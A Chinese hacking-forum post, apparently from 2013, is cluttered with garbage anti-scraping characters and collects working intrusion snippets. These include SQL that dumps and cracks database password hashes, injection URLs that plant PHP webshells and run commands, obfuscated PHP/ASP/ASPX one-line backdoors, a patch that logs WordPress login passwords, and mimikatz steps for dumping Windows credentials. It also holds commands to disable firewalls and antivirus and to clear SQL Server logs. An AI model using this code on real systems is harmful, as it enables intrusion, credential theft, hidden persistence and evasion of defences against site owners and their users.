# l! H$ K* e. q; horacle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解# s' [$ M' Q W
程序代码" ^2 g& U4 s, A' u
select username,password from dba_users; 3 R m+ b( b5 @0 h' C4 a5 }/ [/ j, W
. x9 s% \6 d2 T+ p7 |. Kmysql远程连接用户5 i* s& C+ f7 Z
程序代码 / Z0 V9 u( H- D; f7 p2 l$ C8 v0 F7 _) y- `
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme'; 6 q# V: M; Z: X t3 V# i |GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION1 }9 v7 w( X: t
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# C. e# [$ k6 z( J
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;( p. q. i0 F/ l: r
0 U. \) b6 O# d$ _# K {2 G
& {9 I! P; M+ @) {% g, r8 t0 r H, }2 Y2 m; ]5 j& Z' l9 i1 D; @) P
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0' K( A; L* t& w+ a1 r' v
9 r0 ^& P# v0 ?9 Y
1.查询终端端口* t" }. E+ M( O# v( `6 Q4 [
s3 Y7 a2 J- V& |" Y
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0 J# s- l- N! X6 w# T [5 E2 U g- D5 W+ ]4 r* J8 E
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"$ S1 |. Z/ {- @ m0 b
type tsp.reg4 _$ w9 i3 q, A3 P3 a6 \4 w
! c' Z- q) N0 c4 V& n: K1 G
2.开启XP&2003终端服务! [3 l8 N# I- _- N) k
+ R. K- k. W7 B5 a测试1:* f" v: g# d; U7 P# l2 J
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1 ) |8 Q* q9 {: E [# S ! t, |9 x0 q7 t: _% a/ M1 U* q测试2:$ |: E3 t! z% U6 ]9 Y( U8 N
$ E0 ~9 h) A k% ^create table dirs(paths varchar(100),paths1 varchar(100), id int) ! E: \. @* j- o* g 1 Z7 c0 ]& L/ Vdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--+ K8 Z, Z; H! Y- h/ u' D
- h" y; U5 m$ W% y/ b
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1/ a! u# l3 v1 o' C) }& G
* x: S) R0 }: d4 O U8 G
查看虚拟机中的共享文件:! u4 W1 j j9 [! |
在虚拟机中的cmd中执行 9 |( R4 Y: v3 u0 G\\.host\Shared Folders ' j+ r w' {9 T+ g 8 I9 E, r, C% v: \cmdshell下找终端的技巧 ! N/ H6 @) P5 z/ }+ C t3 H找终端: : s) {$ ~5 X8 d/ V2 s' R# ^1 H第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! , ^2 w' u. h3 @% o- T/ L6 G
而终端所对应的服务名为:TermService " [6 B8 D$ |( l, F9 Q1 M第二步:用netstat -ano命令,列出所有端口对应的PID值! ' I' p1 {2 ~) O. I. W/ B 找到PID值所对应的端口 : j$ V0 P6 v1 e+ {4 a/ b1 A2 z( F( c3 ^& j9 I [
查询sql server 2005中的密码hash. P1 K3 I! G9 F0 V$ \# u
SELECT password_hash FROM sys.sql_logins where name='sa' 6 w" I+ z4 n! B$ V0 k4 H" u5 TSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a ' u8 H" S; O% F* d* Qaccess中导出shell! V3 w) X0 J K* x& U/ }
5 e O9 Q" [) ^* N# H# p
中文版本操作系统中针对mysql添加用户完整代码:2 u! |; I" p* U% d
6 T* B/ \. Z9 i5 }; u6 U' Suse test; * E5 h# p: _8 bcreate table a (cmd text); " d" a3 v$ h1 \, T6 V! N5 [5 { Einsert into a values ("set wshshell=createobject (""wscript.shell"") " );1 }6 A3 }3 X+ B$ r4 |1 k- Z
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* `, f" B) P: ]/ u
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );% W. A; |# I( v5 ^. D* p3 @/ j
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; 0 O5 Y K8 G) }3 v: tdrop table a; 7 X8 X: C0 u( Q9 u% J7 L/ O0 t3 j( Q! g( I5 P) o2 e
英文版本: + k6 @) r; d+ h' T; k8 E/ L: P7 \9 S) b3 s" ~. i
use test; 8 d. s# ?% I1 s* |$ Q! b8 dcreate table a (cmd text); ) p% w O& Z' iinsert into a values ("set wshshell=createobject (""wscript.shell"") " ); 1 ?* ]+ _ z) K7 Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );5 L7 \; L1 a' @4 f2 n
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 O! U( Y% H( j1 E: d
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs"; 8 g$ D" ^$ j/ t0 _drop table a;5 A5 A/ H6 E7 m6 c& ~; Q [
4 j% K/ k1 ^5 a' A* V. G$ g' k
create table a (cmd BLOB);9 y$ t C* q: m4 C
insert into a values (CONVERT(木马的16进制代码,CHAR));4 [) ^3 t$ U6 L# i7 @6 b1 ^
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 1 o8 ~! N6 [/ A0 Qdrop table a; 2 E$ O: L' ~, L4 v& [( L4 L' ]+ m% Y* ~0 d: m5 O' i
记录一下怎么处理变态诺顿 ' |% Z, F0 C }( r/ Z查看诺顿服务的路径+ u' k p0 {8 V6 I
sc qc ccSetMgr# {! i: d; L2 i4 ^( s
然后设置权限拒绝访问。做绝一点。。5 w4 j) n5 P- k5 q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system + p8 a: ~* z. {8 Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"- n9 i) B5 V M+ B9 J7 [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators. C& M7 G) v4 V, v0 g9 @2 T. c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone5 O; H- E5 i* m4 X' l: G
9 U( P6 U2 }2 M1 @" c: ~% K0 G
然后再重启服务器 " z. |0 G B% A( t6 o, r- V4 Iiisreset /reboot ) J f9 |/ T' J, c. h! M2 S这样就搞定了。。不过完事后。记得恢复权限。。。。 8 D, x" d, P4 b" m4 J; fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F6 b/ [/ Z' y! S- T7 F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F " Z% c, X! T, a2 W" r( \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F B- |7 T0 p k, j$ ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F+ u9 x' f/ B" B+ u L
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin: ~1 {" J" Q+ ]& Y
+ l% Y& s( C6 }+ _% _
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')9 [* W. L8 q2 R# u. z* n) ?0 K3 d
% n2 B4 T, I! _5 q2 Z
postgresql注射的一些东西/ O( h; D$ t$ F% I6 c0 c0 r1 G
如何获得webshell 5 `4 k* T- j' a4 shttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 2 S! h' q' G" O( K+ O http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 5 e5 o. p, S" [6 V' u& |4 } http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;5 R- T6 ` K. q
如何读文件3 X' v6 h" t1 N http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);4 t! V4 R+ p8 k) q/ @5 _ http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;( B( H2 ?; X, k& g http://127.0.0.1/postgresql.php?id=1;select * from myfile; $ a2 A$ z V: o; K2 z& j4 v8 ]5 `9 m0 q! P8 D! G% R x# S: Y
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。 # B8 I: ?1 c0 X' V- `当然,这些的postgresql的数据库版本必须大于8.X - `: K' c( Z. ^: T9 ?! o4 z创建一个system的函数: * s4 v- k1 L2 c: F8 \3 _CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT # ]4 I3 W+ B" u+ x6 f' N7 Y2 U: M0 m7 h4 G ]' @" V3 ]6 V
创建一个输出表: % ]" \. g# [$ G. t# h! xCREATE TABLE stdout(id serial, system_out text); B+ ]" |4 U6 c! q
7 [$ q0 J3 Q$ H% M& d+ \
执行shell,输出到输出表内:5 Y1 g* M4 N9 |3 B% B- n: a
SELECT system('uname -a > /tmp/test')5 I& u) W! a9 N6 q. |: e4 I3 [
& O* i' a2 s. B1 s' I5 Q/ C* M6 I
copy 输出的内容到表里面; $ s) f1 w b: N: R) k+ z# zCOPY stdout(system_out) FROM '/tmp/test'4 N! u2 M* \2 A* x
2 s& k% g. O8 E5 C$ J
从输出表内读取执行后的回显,判断是否执行成功 ; N. t0 L" P5 F2 J7 ]. `3 i$ ~ , c& `& b K! j$ ~' h6 PSELECT system_out FROM stdout+ t) Y/ A" x1 E1 W0 ~
下面是测试例子, e; I/ N5 l- `9 d+ u9 [4 _& e' |7 j
: W6 Z$ U/ u* z- _" h* ]
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- \" ]6 b! v1 U" ?1 k
' [8 Y" ^( ?- d! v* x3 M5 a' q
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C': N. T* z1 E9 D. S0 D
STRICT --$ B- \7 B3 ? ^
# C2 v$ u. q7 Q( j/ v- u/store.php?id=1; SELECT system('uname -a > /tmp/test') --6 |5 `" F& _! l. Z. W( E
7 M; Z# c- h( |0 a0 m; K
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --8 l0 Y7 [' }! M4 y# G
5 G$ w! o0 u% n8 Q' B: U
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--* l3 l& q$ j4 V1 V0 ^0 ]
net stop sharedaccess stop the default firewall' y. N N3 Z* H
netsh firewall show show/config default firewall2 h6 k g7 g& t
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall( B R/ P o0 V' `
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall : j7 ]) y) [8 o5 E% w: C修改3389端口方法(修改后不易被扫出)5 W$ b9 P7 M- O+ G) r. ]
修改服务器端的端口设置,注册表有2个地方需要修改& V, q. `1 q* M3 O
% Q$ H" K1 Y) X& P- g. f* ~. G[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]) ]1 o; ?! M1 B, E/ [$ `5 `$ z7 g
PortNumber值,默认是3389,修改成所希望的端口,比如6000 # K1 Q; h; G" P3 p+ b' d: H4 r( _( M
第二个地方: 5 D8 l, G+ j0 F6 Y2 [, {8 {[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] . I- r9 T6 {- {: {7 Z2 f5 O' u
PortNumber值,默认是3389,修改成所希望的端口,比如6000; ^) o8 ]+ F, s% Z: R# C$ e; M
, g; J! [5 p+ Q6 K: P
现在这样就可以了。重启系统就可以了7 x% E; ]7 O! J* }4 t3 d% d
/ H3 u P! b9 C1 v8 W//危险的include函数,直接编译任何文件为php格式运行6 I( j6 A* I' W7 W" ]
1 j: Q/ O+ |% F8 n% X$ v
3、1 p+ e! v* n9 Y. A! U2 y" G' B
5 o# O" p4 X$ Q8 A+ J6 x x$reg="c"."o"."p"."y"; 3 n% m+ ? g; O" k; x - t5 g8 J( r( D. n# e$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); ; j% ^- s h( r- R& G, t 7 q/ I+ r( `. z8 `$ N//重命名任何文件 : M) x, y; D6 L% g& l- Y; ? - y* ]& N& g% Q- M' [* k4、 ; u- |$ i; Y: x. w; ~7 m' @4 @$ ^/ }! Y2 ~% Z1 A9 f
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; * a; S. b' f% d" ^1 a+ e$ F J" _9 E. p
$gzid("/[discuz]/e",$_POST['h'],"Access");! e x9 o, z3 c* I% O; F
p/ }# F& L* k& y, m6 K5 s; m//菜刀一句话 7 [- F4 M" `8 f( W% `, u9 m$ r" m$ a! F4 C4 Z1 P& o$ B
5、include ($uid); . T; n- F$ N7 l5 J2 I * H9 a! T' O$ v1 a! ]0 l0 o& h0 `//危险的include函数,直接编译任何文件为php格式运行,POST 3 d5 ~! C. T' v7 \0 a/ v : Y. ` \! R. O Q 5 D; r& Y' q8 s* Y//gif插一句话8 H. [* | c/ n
+ u& E% ]- J6 x! {
6、典型一句话8 t* P& c7 c3 K8 D# r0 R, _
$ A7 V! {6 r) a( O8 T, b6 h程序后门代码" L$ O% J4 R; C- [* W* e+ K
<?php eval_r($_POST[sb])?>6 k) s3 l+ r f- u' d; x P3 A
程序代码# M. p* x z& n. d% z7 \2 g
<?php @eval_r($_POST[sb])?> 1 J- b! d9 a) U! Q//容错代码 9 ^% J! P i4 B7 Z- D6 I程序代码9 T- P; W6 m; S2 K# j
<?php assert($_POST[sb]);?>7 v$ I" ]0 }0 J8 a
//使用lanker一句话客户端的专家模式执行相关的php语句 " n& Y( X/ p6 r程序代码& h0 q8 a9 q7 [( }
<?$_POST['sa']($_POST['sb']);?> ( l! J4 c% e( ?. F. ^程序代码/ O+ ?6 k9 c+ Z' I, @
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>2 P/ M" y9 A \6 o
程序代码* K R# z7 _! B: U
<?php ; w( e% R4 o' X( O@preg_replace("/[email]/e",$_POST['h'],"error");( X" { u! x4 n
?>. e9 J* d+ x C0 W9 i$ u
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 ( }+ D* Z* O( Q9 x7 X程序代码 4 G/ ~; y! ]8 \7 N<O>h=@eval_r($_POST[c]);</O>, G! o" e" B- r/ r2 z! y
程序代码3 I3 A( U6 n; `( }: r5 k( @
<script language="php">@eval_r($_POST[sb])</script> 0 O& k2 a: V9 f% A. J' ~) J//绕过<?限制的一句话 4 r2 e8 j2 q# [" I( n0 b+ Y0 F/ Y3 G, f5 m http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip ) s o; w, Z# `9 z- ?& [: M' h4 B详细用法:$ J6 n+ U- x% a( h1 k, e0 N( {& J6 B5 e
1、到tools目录。psexec \\127.0.0.1 cmd6 J! c5 r3 n( d& ^6 J
2、执行mimikatz( n+ w+ \$ z# R2 V; W1 B! ~& P4 `6 X
3、执行 privilege::debug % x" S0 t! l+ l) k9 D4、执行 inject::process lsass.exe sekurlsa.dll 5 [: F1 X- G5 s2 S! d# k5、执行@getLogonPasswords- L4 ]" `1 e& y/ k9 t
6、widget就是密码 9 F& r" R& h( ^4 h! J9 Q. G7、exit退出,不要直接关闭否则系统会崩溃。7 _) B6 L1 ^! ~1 w
7 D3 P2 }3 R6 u& ^8 V http://www.monyer.com/demo/monyerjs/ js解码网站比较全面 5 t5 a: I; O( n6 w% C 3 |- \, V: A- m: F& B4 r/ q# v4 O自动查找系统高危补丁 & c6 x& n% O* y/ k% |& n# M8 csysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt ! ~5 F; Y4 w+ o1 [" L e5 _ d |# ^ K; @. r+ T4 A2 }8 P
突破安全狗的一句话aspx后门8 A2 _* m6 j! G. @- Q) c# n( A
<%@ Page Language="C#" ValidateRequest="false" %> 4 d! v8 U+ }& e! q, j2 X+ I<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>: s0 i1 L- f7 q# e
webshell下记录WordPress登陆密码 0 V {" v( f/ k# iwebshell下记录Wordpress登陆密码方便进一步社工 & O- V' u; I4 @$ s在文件wp-login.php中539行处添加: ! ?; G% m8 n9 L// log password 7 e7 @% X( Q7 a: V$log_user=$_POST['log'];, l2 P: Z9 k5 e) N4 z9 S
$log_pwd=$_POST['pwd'];, h* f6 U' A& W1 O, b" E) z$ v; e- n
$log_ip=$_SERVER["REMOTE_ADDR"]; % y; I7 k; Y+ }9 \$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; & r% `5 B/ t" r" W, Y- y$txt=$txt.”\r\n”; : O) c& M0 ^0 e* F5 h0 M% [& [if($log_user&&$log_pwd&&$log_ip){ ( H, t7 Q" d5 j' y& G: }2 \@fwrite(fopen(‘pwd.txt’,”a+”),$txt); 8 J. J3 m9 a, V+ u. I6 `4 |}' b0 I$ f- G* J2 F4 V! ^
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。 j" t: Y# I7 H! n! q
就是搜索case ‘login’) N* ~ _1 L8 R, Z2 T
在它下面直接插入即可,记录的密码生成在pwd.txt中, ! T. B" ^ S" z9 D8 b其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录 * t# ^* n9 J2 R利用II6文件解析漏洞绕过安全狗代码: " E' O' X5 L: e. b& b) a;antian365.asp;antian365.jpg) {4 w/ {2 @! f7 ?! I+ t
4 F6 _7 ^& o& \' n各种类型数据库抓HASH破解最高权限密码!% B; B# \% z' t! Q& q
1.sql server2000 7 e- d1 o. ]% R4 rSELECT password from master.dbo.sysxlogins where name='sa'& W4 m5 n+ Y6 f: b
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503415 M6 X$ r5 t2 u
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A' p/ M7 z1 v& c1 V; b9 \
+ F2 b( @' B& }, Q- Y0×0100- constant header) K+ w/ n* K* Q* c/ K3 K! \- l5 q( T' S
34767D5C- salt 9 H& [: s3 S. a. u0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash6 _5 Y4 S9 n7 M/ H/ e. Y6 x
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash' I9 l, j) u S" a2 c
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash 2 ^! f8 x5 y3 N f; x" I: f: \SQL server 2005:- 5 Q7 n7 k$ n+ ~5 l9 r+ GSELECT password_hash FROM sys.sql_logins where name='sa' ! ` R1 G! t) L* p+ X% N" O" U$ U0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F + O7 ] z1 O6 H8 V6 U m0×0100- constant header' W8 X$ W3 f2 T3 x, Y3 U
993BF231-salt I7 \! G# }' \
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash D7 R; f8 _, `1 `crack case sensitive hash in cain, try brute force and dictionary based attacks.# j% c, r8 p: E" ]
0 j) w" B) S4 j$ g. [* c. w9 T
update:- following bernardo’s comments:- " [: ^, E+ ~9 t8 R Guse function fn_varbintohexstr() to cast password in a hex string. 6 |# n9 k3 r; J7 de.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins; N$ Y# y8 S& U, d$ D* b% R
. e: H: j* i2 ]3 s9 s# h( z GMYSQL:-4 ?+ G- v6 X2 a! [. t& a1 s8 f) x
% b( ]6 P; @! a9 m9 P4 N9 j& p
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2. y! v: `- ?6 C/ Q; k0 N
1 W% Z5 m# U Kmysql> SELECT PASSWORD(‘mypass’);5 `$ p* A! L* y4 K; x
+——————————————-+ ; k( u4 K" U v9 U1 T$ V& J| PASSWORD(‘mypass’) |( \$ l# g! @8 H$ j
+——————————————-+ / c! D5 `8 b$ @| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |: S# j& _9 H) }5 ?" w
+——————————————-+ % w) n& m# _" A* h8 }- H* X6 b$ |9 N+ D: e
Select user, password from mysql.user; d& M+ Y# v* f8 U/ r$ a
The hashes can be cracked in ‘cain and abel’# A- w! P/ Q4 f+ k
0 J3 y* o; g+ V3 jPostgres:- 5 b2 i; B4 X. M8 r2 Z! `Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) 0 i+ P- q: |2 U2 ` c, cselect usename, passwd from pg_shadow; 3 U/ ~. T. W: u7 z( c& O0 Pusename | passwd6 `% l1 k `/ T2 ]
——————+————————————- - \5 g3 U5 ?* V. U$ F, htestuser | md5fabb6d7172aadfda4753bf0507ed4396* N* u8 f$ @& K/ ~4 C- R
use mdcrack to crack these hashes:- 6 Q/ M* t* H. L) A. B$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43969 i, C$ Y2 r( s# A
: W; d9 _7 a6 P9 a W% R3 I
Oracle:- H, X0 W$ N- Y) T. e) V! B
select name, password, spare4 from sys.user$- ~% u, _7 m1 t3 \* u
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g' @, t- G9 H @' c
More on Oracle later, i am a bit bored…. : v3 Z* m. k# }; \+ `0 B* ]7 Q1 o 8 v, [4 q1 W4 O$ t' I: w) Q, {: C- B0 d, r+ f5 K% d
在sql server2005/2008中开启xp_cmdshell / V, A' G7 W! e4 [0 v% [( k! S5 u-- To allow advanced options to be changed. ) A4 u/ X3 W3 M# C }EXEC sp_configure 'show advanced options', 1% D& r- `* N7 \
GO ) F# r! S! E2 g; W \4 h-- To update the currently configured value for advanced options./ A" \0 y) Z4 y6 v D' O+ [- C
RECONFIGURE ( T5 S% c9 v4 z) B+ B, {. q3 |6 h1 eGO % R% y# D9 \: n" M. @! K* F. l' ]-- To enable the feature. - F6 _* ^1 Y- S" X( _3 R* B. AEXEC sp_configure 'xp_cmdshell', 1+ p- y) l7 f1 o7 g
GO " S+ m& _: g1 B) m: q-- To update the currently configured value for this feature.2 P% L4 @/ S) M Y9 O$ s7 J5 f1 j# }
RECONFIGURE# D' x; D* x3 E" q7 r
GO 5 P) N G% D' HSQL 2008 server日志清除,在清楚前一定要备份。 & Y/ ?3 {' B3 {2 X6 X6 o如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除: 4 k" ~ `0 R( {" v7 B$ hX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin 4 k V c, |$ ]7 ~9 N* y" g( o; [: h3 g4 o5 y+ A" }. z. P6 j
对于SQL Server 2008以前的版本: 6 N d, x" r* x: F3 KSQL Server 2005: ! z7 G, G- {* I, C) A删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat( r& f! j# q1 A2 K4 @2 {- I- [& a S
SQL Server 2000: ! w, j' e" e4 c7 `6 G清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。. Q; L7 T+ L# V9 [; c& i1 E/ s' h
9 }, x$ Q9 t/ w% c1 I& k
本帖最后由 simeon 于 2013-1-3 09:51 编辑8 v/ |1 d) L* J( Y8 p